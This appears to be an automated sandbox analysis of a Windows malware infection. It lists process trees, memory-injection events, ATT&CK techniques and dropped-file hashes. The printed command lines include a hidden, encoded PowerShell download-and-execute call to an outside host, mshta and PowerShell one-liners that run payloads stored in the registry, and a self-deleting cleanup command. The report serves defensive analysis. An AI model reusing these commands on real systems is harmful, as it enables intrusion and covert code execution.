3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3260 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4884 powershell.exe
3260 Explorer.EXE
3260 Explorer.EXE
3260 Explorer.EXE
3260 Explorer.EXE
3260 Explorer.EXE
3260 Explorer.EXE
2752 cmd.exe

pid	process
3260	Explorer.EXE

pid	process
4884	powershell.exe
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
2752	cmd.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowershell.exeExplorer.EXERuntimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeShutdownPrivilege	3260	Explorer.EXE
Token: SeCreatePagefilePrivilege	3260	Explorer.EXE
Token: SeShutdownPrivilege	3260	Explorer.EXE
Token: SeCreatePagefilePrivilege	3260	Explorer.EXE
Token: SeShutdownPrivilege	3260	Explorer.EXE
Token: SeCreatePagefilePrivilege	3260	Explorer.EXE
Token: SeShutdownPrivilege	3260	Explorer.EXE
Token: SeCreatePagefilePrivilege	3260	Explorer.EXE
Token: SeShutdownPrivilege	3808	RuntimeBroker.exe
Token: SeShutdownPrivilege	3808	RuntimeBroker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3260 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3260 Explorer.EXE

pid	process
3260	Explorer.EXE

pid	process
3260	Explorer.EXE

Suspicious use of WriteProcessMemory 55 IoCs

Processes:

mshta.execmd.exepowershell.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4900 wrote to memory of 4664	4900	mshta.exe	cmd.exe
PID 4900 wrote to memory of 4664	4900	mshta.exe	cmd.exe
PID 4900 wrote to memory of 4664	4900	mshta.exe	cmd.exe
PID 4664 wrote to memory of 3188	4664	cmd.exe	powershell.exe
PID 4664 wrote to memory of 3188	4664	cmd.exe	powershell.exe
PID 4664 wrote to memory of 3188	4664	cmd.exe	powershell.exe
PID 3188 wrote to memory of 1108	3188	powershell.exe	gPEkKBRh.exe
PID 3188 wrote to memory of 1108	3188	powershell.exe	gPEkKBRh.exe
PID 3188 wrote to memory of 1108	3188	powershell.exe	gPEkKBRh.exe
PID 4212 wrote to memory of 4884	4212	mshta.exe	powershell.exe
PID 4212 wrote to memory of 4884	4212	mshta.exe	powershell.exe
PID 4884 wrote to memory of 256	4884	powershell.exe	csc.exe
PID 4884 wrote to memory of 256	4884	powershell.exe	csc.exe
PID 256 wrote to memory of 2988	256	csc.exe	cvtres.exe
PID 256 wrote to memory of 2988	256	csc.exe	cvtres.exe
PID 4884 wrote to memory of 4500	4884	powershell.exe	csc.exe
PID 4884 wrote to memory of 4500	4884	powershell.exe	csc.exe
PID 4500 wrote to memory of 1596	4500	csc.exe	cvtres.exe
PID 4500 wrote to memory of 1596	4500	csc.exe	cvtres.exe
PID 4884 wrote to memory of 3260	4884	powershell.exe	Explorer.EXE
PID 4884 wrote to memory of 3260	4884	powershell.exe	Explorer.EXE
PID 4884 wrote to memory of 3260	4884	powershell.exe	Explorer.EXE
PID 4884 wrote to memory of 3260	4884	powershell.exe	Explorer.EXE
PID 3260 wrote to memory of 3808	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 3808	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 3808	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 3808	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 4024	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 4024	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 4024	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 4024	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 4176	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 4176	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 4176	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 4176	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 3984	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 3984	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 3984	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 3984	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 wrote to memory of 2752	3260	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 2752	3260	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 2752	3260	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 3632	3260	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 3632	3260	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 3632	3260	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 3632	3260	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 2752	3260	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 2752	3260	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 3632	3260	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 3632	3260	Explorer.EXE	cmd.exe
PID 2752 wrote to memory of 3976	2752	cmd.exe	PING.EXE
PID 2752 wrote to memory of 3976	2752	cmd.exe	PING.EXE
PID 2752 wrote to memory of 3976	2752	cmd.exe	PING.EXE
PID 2752 wrote to memory of 3976	2752	cmd.exe	PING.EXE
PID 2752 wrote to memory of 3976	2752	cmd.exe	PING.EXE

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3808

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\client_5.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4900

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
2⤵
- Suspicious use of WriteProcessMemory
PID:4664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188

C:\Users\Admin\AppData\Local\Temp\gPEkKBRh.exe
"C:\Users\Admin\AppData\Local\Temp\gPEkKBRh.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 472
5⤵
- Program crash
PID:3560

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4176

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4024

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3260

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ckfc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ckfc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\304F83E1-CF18-E2AF-D964-73361DD857CA\\\OperatorAbout'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ywglbk -value gp; new-alias -name iubrmsy -value iex; iubrmsy ([System.Text.Encoding]::ASCII.GetString((ywglbk "HKCU:Software\AppDataLow\Software\Microsoft\304F83E1-CF18-E2AF-D964-73361DD857CA").ClassDocument))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\przoxl3e\przoxl3e.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:256

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE493.tmp" "c:\Users\Admin\AppData\Local\Temp\przoxl3e\CSC1EAF65091F824C08BAAAECFFCC3EEBDD.TMP"
5⤵
PID:2988

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ghxwzpmd\ghxwzpmd.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4500

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE54F.tmp" "c:\Users\Admin\AppData\Local\Temp\ghxwzpmd\CSC6C97E6AD8E634ECBBBCE9A70897FD037.TMP"
5⤵
PID:1596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\gPEkKBRh.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2752

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3976

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:3632

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1108 -ip 1108
1⤵
PID:4472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
4c4f6db32b8e31d450451fe2bcfa95b5

SHA1
2bded19fcc33903e64842ac06fef4b119770673b

SHA256
1f040c042d94ca716f36d2c4835e7c2390717bfd7d9cf0a174d9a14b3a83eb29

SHA512
d11f7f8b4a1d71d7797c5618e377aa29033d079ee7698abbcbab6535e3b2097f48b955cc5146df87b77de57bfcecaa86d1ad522911bb66c550c203bd346e9a7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE493.tmp
Filesize
1KB

MD5
bd79d56f9839d92acc88d22e79b6aba5

SHA1
83b032c9fd1c5ef66a673d7932abadd1b93d4bf2

SHA256
3a151f8e2b94d8eedde65bb0adad988e11bc2d1aed3a6d288608c326790eadf7

SHA512
1ffdc8913a99e4430c2d0bdc50ffdf7aae7894bfb396404f40e1ccb4751158eaf0f5d8e85443eea7e56df706741875df1d5f379114986fc0cafa7d5836d78624

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE54F.tmp
Filesize
1KB

MD5
08d1d059481e11d008472feb7fd717a4

SHA1
8ab880df07f86efb9f413fc47ebc652a4094af16

SHA256
6841ecec1f87785af1e4e637eeb8c5a9efea1f496e98cb7ac3245f443634216a

SHA512
a041bd0847edb6a7c1b8030010a2a618927e438dcb0a269e6db4a1c057b961d7236c1e88747f4c82422f973d6c1435378d23535b81dea0113449828d916d4f27

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2c4xsjuy.quf.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gPEkKBRh.exe
Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
C:\Users\Admin\AppData\Local\Temp\gPEkKBRh.exe
Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
C:\Users\Admin\AppData\Local\Temp\gPEkKBRh.exe
Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
C:\Users\Admin\AppData\Local\Temp\ghxwzpmd\ghxwzpmd.dll
Filesize
3KB

MD5
cd8e45bddb1326c93e45320a7c04a54c

SHA1
584107fb7b320eee681174ff342036ca3b627a77

SHA256
61dfa96d1d27aaaead7a040b0ef94e380561d5a72bc3122ccd0fd304bc671329

SHA512
588a10dcb39329cdf9cb3292291c71d55480ae16deb20772bd52ed7be621bd1da787f82ee0253e8050a7a796b0945d3ce53bac0427c5743817aa8e391a7981c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\przoxl3e\przoxl3e.dll
Filesize
3KB

MD5
89f1cce8eb103180104dfb58a4ff6b32

SHA1
be563afb718cecdc262b901af0520b4dea2b8700

SHA256
065ef15cc93717e66754e997e9cc76b3af378b462bbed9c77b984ba9b0b731db

SHA512
79640e309010d3a131e94f92cd1f9e40273e704ebf818a65165bba5bba39f35cb9e200295bc17e30e4abc0ea932c2ae06822b8951ae38bafae19fff2b53650d8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ghxwzpmd\CSC6C97E6AD8E634ECBBBCE9A70897FD037.TMP
Filesize
652B

MD5
2ecd55c6698148729f626c0e4264d29c

SHA1
b0f5e50bf988b646a071355c60d416321a5c88f6

SHA256
e237a84a99ed7a570d26be52978c92fd17197655f47377e6eb8dc7efaa806fd3

SHA512
bb9bad8ecd3a51397a5cc2bf99d0e5e4854daaf1d9b60fb607a744c2b5e2ab66db21479eebc81070f467e506c8132b120fae25b90ac12bd853632a627cb8c53e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ghxwzpmd\ghxwzpmd.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ghxwzpmd\ghxwzpmd.cmdline
Filesize
369B

MD5
9c91d7699ecb7884ae8ef530389b2162

SHA1
28fc1287c3f627430ecb5ba0937b3174d8f128a6

SHA256
67f9601d41cd3f6fe1c0ac0be815ec0a161137a4f5681ae867d39d64781ab3de

SHA512
1130795fda0fd023868d6a6fad3876e6a9d10dab1fca9507c71eb91fa5fa4025c9f5acb47f5aa6e94096a8d43ee0d5327ef1b50a036f3597f67b07ceb73cf52f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\przoxl3e\CSC1EAF65091F824C08BAAAECFFCC3EEBDD.TMP
Filesize
652B

MD5
0627a0dddeeba63e2752e8cb8b5ed47f

SHA1
7aaed182feeb807b036cc6226a53b1abc55ee21a

SHA256
c44c00adcd9fd893dfaebf90fc0ce061a96715e997348943dc794aacba983ffa

SHA512
fa8693e6f3e33002562329c1f4736cc14437daaf2bb27ebe172b0bda4a4f2477d6d3adcfefe5ab3983d927a59d15dae4443acb890a9d8323f9c27149c58d1d96

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\przoxl3e\przoxl3e.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\przoxl3e\przoxl3e.cmdline
Filesize
369B

MD5
8b11ab0642ad3827b234283ee9ff56cd

SHA1
a0da13bbdfd200d3657c97dcf665503d5157d0ff

SHA256
e3d65871ffc577402cd1019547042eda86f09e745ef2129672c439aa3fcd622a

SHA512
1080e9c3a9e66f317198953e25b8120939996f2deb85f08f35d446c28954773b9d120fafd3c6d9651eb44f8cea47fc535b9d2582d47362f7e9053c00c4ac17f7

Download Submit
memory/1108-43-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1108-49-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1108-48-0x0000000002500000-0x0000000002600000-memory.dmp

Filesize
1024KB

Download
memory/1108-45-0x00000000023D0000-0x00000000023DD000-memory.dmp

Filesize
52KB

Download
memory/1108-44-0x00000000023A0000-0x00000000023AB000-memory.dmp

Filesize
44KB

Download
memory/1108-42-0x0000000002500000-0x0000000002600000-memory.dmp

Filesize
1024KB

Download
memory/2752-135-0x0000014BEB350000-0x0000014BEB3F4000-memory.dmp

Filesize
656KB

Download
memory/2752-138-0x0000014BEB230000-0x0000014BEB231000-memory.dmp

Filesize
4KB

Download
memory/2752-158-0x0000014BEB350000-0x0000014BEB3F4000-memory.dmp

Filesize
656KB

Download
memory/3188-26-0x0000000007E60000-0x0000000008404000-memory.dmp

Filesize
5.6MB

Download
memory/3188-2-0x00000000026D0000-0x00000000026E0000-memory.dmp

Filesize
64KB

Download
memory/3188-27-0x0000000070A70000-0x0000000071220000-memory.dmp

Filesize
7.7MB

Download
memory/3188-0-0x0000000070A70000-0x0000000071220000-memory.dmp

Filesize
7.7MB

Download
memory/3188-25-0x00000000070B0000-0x00000000070D2000-memory.dmp

Filesize
136KB

Download
memory/3188-1-0x0000000002620000-0x0000000002656000-memory.dmp

Filesize
216KB

Download
memory/3188-24-0x0000000007120000-0x00000000071B6000-memory.dmp

Filesize
600KB

Download
memory/3188-40-0x0000000070A70000-0x0000000071220000-memory.dmp

Filesize
7.7MB

Download
memory/3188-3-0x00000000026D0000-0x00000000026E0000-memory.dmp

Filesize
64KB

Download
memory/3188-4-0x0000000004E40000-0x0000000005468000-memory.dmp

Filesize
6.2MB

Download
memory/3188-22-0x00000000060F0000-0x000000000610A000-memory.dmp

Filesize
104KB

Download
memory/3188-21-0x0000000007230000-0x00000000078AA000-memory.dmp

Filesize
6.5MB

Download
memory/3188-20-0x00000000026D0000-0x00000000026E0000-memory.dmp

Filesize
64KB

Download
memory/3188-19-0x0000000005C30000-0x0000000005C7C000-memory.dmp

Filesize
304KB

Download
memory/3188-18-0x0000000005B60000-0x0000000005B7E000-memory.dmp

Filesize
120KB

Download
memory/3188-5-0x0000000004D10000-0x0000000004D32000-memory.dmp

Filesize
136KB

Download
memory/3188-17-0x00000000056D0000-0x0000000005A24000-memory.dmp

Filesize
3.3MB

Download
memory/3188-9-0x0000000005560000-0x00000000055C6000-memory.dmp

Filesize
408KB

Download
memory/3188-6-0x00000000054F0000-0x0000000005556000-memory.dmp

Filesize
408KB

Download
memory/3260-136-0x0000000009010000-0x00000000090B4000-memory.dmp

Filesize
656KB

Download
memory/3260-96-0x0000000009010000-0x00000000090B4000-memory.dmp

Filesize
656KB

Download
memory/3260-97-0x00000000013B0000-0x00000000013B1000-memory.dmp

Filesize
4KB

Download
memory/3632-146-0x0000000001480000-0x0000000001518000-memory.dmp

Filesize
608KB

Download
memory/3632-144-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

Filesize
4KB

Download
memory/3632-141-0x0000000001480000-0x0000000001518000-memory.dmp

Filesize
608KB

Download
memory/3808-142-0x000001E0F2120000-0x000001E0F21C4000-memory.dmp

Filesize
656KB

Download
memory/3808-110-0x000001E0F2120000-0x000001E0F21C4000-memory.dmp

Filesize
656KB

Download
memory/3808-111-0x000001E0F14A0000-0x000001E0F14A1000-memory.dmp

Filesize
4KB

Download
memory/3976-157-0x00000221E81C0000-0x00000221E8264000-memory.dmp

Filesize
656KB

Download
memory/3976-151-0x00000221E7FE0000-0x00000221E7FE1000-memory.dmp

Filesize
4KB

Download
memory/3976-148-0x00000221E81C0000-0x00000221E8264000-memory.dmp

Filesize
656KB

Download
memory/3984-129-0x0000025F004E0000-0x0000025F004E1000-memory.dmp

Filesize
4KB

Download
memory/3984-156-0x0000025F00530000-0x0000025F005D4000-memory.dmp

Filesize
656KB

Download
memory/3984-128-0x0000025F00530000-0x0000025F005D4000-memory.dmp

Filesize
656KB

Download
memory/4024-116-0x00000162C0BB0000-0x00000162C0BB1000-memory.dmp

Filesize
4KB

Download
memory/4024-149-0x00000162C2F10000-0x00000162C2FB4000-memory.dmp

Filesize
656KB

Download
memory/4024-115-0x00000162C2F10000-0x00000162C2FB4000-memory.dmp

Filesize
656KB

Download
memory/4176-121-0x00000156B1D10000-0x00000156B1DB4000-memory.dmp

Filesize
656KB

Download
memory/4176-122-0x00000156B15B0000-0x00000156B15B1000-memory.dmp

Filesize
4KB

Download
memory/4176-155-0x00000156B1D10000-0x00000156B1DB4000-memory.dmp

Filesize
656KB

Download
memory/4884-63-0x00007FF98C8E0000-0x00007FF98D3A1000-memory.dmp

Filesize
10.8MB

Download
memory/4884-108-0x0000021E7C130000-0x0000021E7C16D000-memory.dmp

Filesize
244KB

Download
memory/4884-107-0x00007FF98C8E0000-0x00007FF98D3A1000-memory.dmp

Filesize
10.8MB

Download
memory/4884-94-0x0000021E7C130000-0x0000021E7C16D000-memory.dmp

Filesize
244KB

Download
memory/4884-92-0x0000021E7C120000-0x0000021E7C128000-memory.dmp

Filesize
32KB

Download
memory/4884-65-0x0000021E7BF70000-0x0000021E7BF80000-memory.dmp

Filesize
64KB

Download
memory/4884-78-0x0000021E63990000-0x0000021E63998000-memory.dmp

Filesize
32KB

Download
memory/4884-64-0x0000021E7BF70000-0x0000021E7BF80000-memory.dmp

Filesize
64KB

Download
memory/4884-57-0x0000021E7BF80000-0x0000021E7BFA2000-memory.dmp

Filesize
136KB

Download